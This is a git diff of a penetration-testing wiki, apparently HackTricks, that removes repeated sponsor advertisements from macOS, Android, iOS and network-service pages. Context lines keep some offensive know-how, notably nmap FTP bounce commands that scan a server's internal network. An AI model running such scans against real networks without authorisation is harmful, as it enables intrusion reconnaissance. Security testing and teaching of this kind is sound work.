- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Main Keychains @@ -155,17 +142,6 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os * [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index ea4cdc4e3..1c18ba6ae 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: 
 </details>
 {% endhint %}
 
-### [WhiteIntel](https://whiteintel.io)
-
-<figure><img src=
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Static Analysis @@ -675,18 +662,6 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) * [**The Art of Mac Malware: The Guide to Analyzing Malicious Software**](https://taomm.org/) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index d0d63a8b0..cf7f273f9 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Memory Artifacts @@ -81,17 +68,6 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem- ``` {% endcode %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md index eaa4a9838..84a14c6aa 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## **Basic Information** @@ -290,17 +277,6 @@ mount /dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled) ``` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md index bc1c53b9f..d1bc4f7c8 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ### Common Users diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 93cd5c129..a36b2d623 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Android Security Model **There are two layers:** @@ -416,12 +408,6 @@ if (dpm.isAdminActive(adminComponent)) { } ``` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md index fa5994f10..2e3d2d84c 100644 --- a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Task, Back Stack and Foreground Activities In Android, a **task** is essentially a set of activities that users interact with to complete a specific job, organized within a **back stack**. This stack orders activities based on when they were opened, with the most recent activity displayed at the top as the **foreground activity**. At any moment, only this activity is visible on the screen, making it part of the **foreground task**. @@ -65,11 +57,6 @@ To prevent such attacks, developers can set `taskAffinity` to an empty string an * [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/) * [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index 23606123a..6321130f3 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. # Automatic diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index eaea1cd3c..78f693d37 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** **For further information check:** [**https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html) @@ -68,17 +55,6 @@ Android apps can use native libraries, typically written in C or C++, for perfor * **Debugging Native Libraries:** * [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index dbe474a51..2137fa5b6 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) @@ -77,13 +69,6 @@ Learn & practice GCP Hacking:
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md index e8534426e..e3d388b91 100644 --- a/mobile-pentesting/ios-pentesting-checklist.md +++ b/mobile-pentesting/ios-pentesting-checklist.md @@ -23,14 +23,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### Preparation * [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md) @@ -119,12 +111,6 @@ Learn & practice GCP Hacking:
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index afc997c99..5124ba90c 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Installing Frida **Steps to install Frida on a Jailbroken device:** @@ -392,17 +378,6 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 50716e420..899e7a95b 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Basic Information diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index c59b8f9db..e923b7c78 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Basic Information @@ -151,17 +138,6 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header * `port:1883 MQTT` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 012c662d3..620720bd4 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ### Docker Basics @@ -363,17 +350,6 @@ You can use auditd to monitor docker. * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/43-pentesting-whois.md b/network-services-pentesting/43-pentesting-whois.md index 1c7d29300..07578cb90 100644 --- a/network-services-pentesting/43-pentesting-whois.md +++ b/network-services-pentesting/43-pentesting-whois.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information The **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. @@ -53,12 +45,6 @@ Also, the WHOIS service always needs to use a **database** to store and extract * `port:43 whois` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/49-pentesting-tacacs+.md b/network-services-pentesting/49-pentesting-tacacs+.md index 0d4abfa68..a3e9a742a 100644 --- a/network-services-pentesting/49-pentesting-tacacs+.md +++ b/network-services-pentesting/49-pentesting-tacacs+.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information The **Terminal Access Controller Access Control System (TACACS)** protocol is used to centrally validate users trying to access routers or Network Access Servers (NAS). Its upgraded version, **TACACS+**, separates the services into authentication, authorization, and accounting (AAA). @@ -61,11 +53,6 @@ By gaining access to the control panel of network equipment using the obtained c * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/network-services-pentesting/7-tcp-udp-pentesting-echo.md index 5b6259cd2..d52a78ce7 100644 --- a/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - # Basic Information @@ -57,12 +49,6 @@ Hello echo #This is the response [CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 22bc04f46..2a57d8968 100644 --- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -16,14 +16,6 @@ Learn & practice GCP Hacking:
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information **IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions. @@ -290,11 +282,6 @@ Ensure that actual, secure values are used to replace the placeholders when conf * `port:500 IKE` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 5fcc1c27e..9d96e6a8a 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information The **File Transfer Protocol (FTP)** serves as a standard protocol for file transfer across a computer network between a server and a client.\ @@ -246,15 +238,6 @@ The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here, * `ftp` * `port:21` -*** - -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md index ee8e55e37..46145fa59 100644 --- a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md +++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## FTP Bounce - Scanning ### Manual @@ -55,12 +47,6 @@ nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443 ``` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md index 6dacc4a29..64d4834e7 100644 --- a/network-services-pentesting/pentesting-imap.md +++ b/network-services-pentesting/pentesting-imap.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Internet Message Access Protocol The **Internet Message Access Protocol (IMAP)** is designed for the purpose of enabling users to **access their email messages from any location**, primarily through an Internet connection. In essence, emails are **retained on a server** rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done **directly from the server**. This capability allows for the convenience of checking emails from **multiple devices**, ensuring that no messages are missed regardless of the device used. @@ -181,12 +173,6 @@ done * `port:143 CAPABILITY` * `port:993 CAPABILITY` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index da47d3c97..86f6da765 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Basic Information @@ -108,17 +95,6 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66 * `looking up your hostname` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 8991ef6ad..8c3ea5cb7 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): @@ -543,14 +535,9 @@ You probably will be able to **escalate to Administrator** following one of thes * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/) * [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/) -* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Try Hard Security Group** +* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) * [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/) -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 7362234d4..9ea68dff5 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -15,13 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## Basic Information @@ -114,11 +107,6 @@ From [https://academy.hackthebox.com/module/112/section/1073](https://academy.ha | `auth_verbose_passwords` | Passwords used for authentication are logged and can also be truncated. | | `auth_anonymous_username` | This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. | -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 5181d8534..4d15494d3 100644 --- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### Overview of Relative Identifiers (RID) and Security Identifiers (SID) **Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain. @@ -106,12 +98,6 @@ done To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). -**Try Hard Security Group** - -
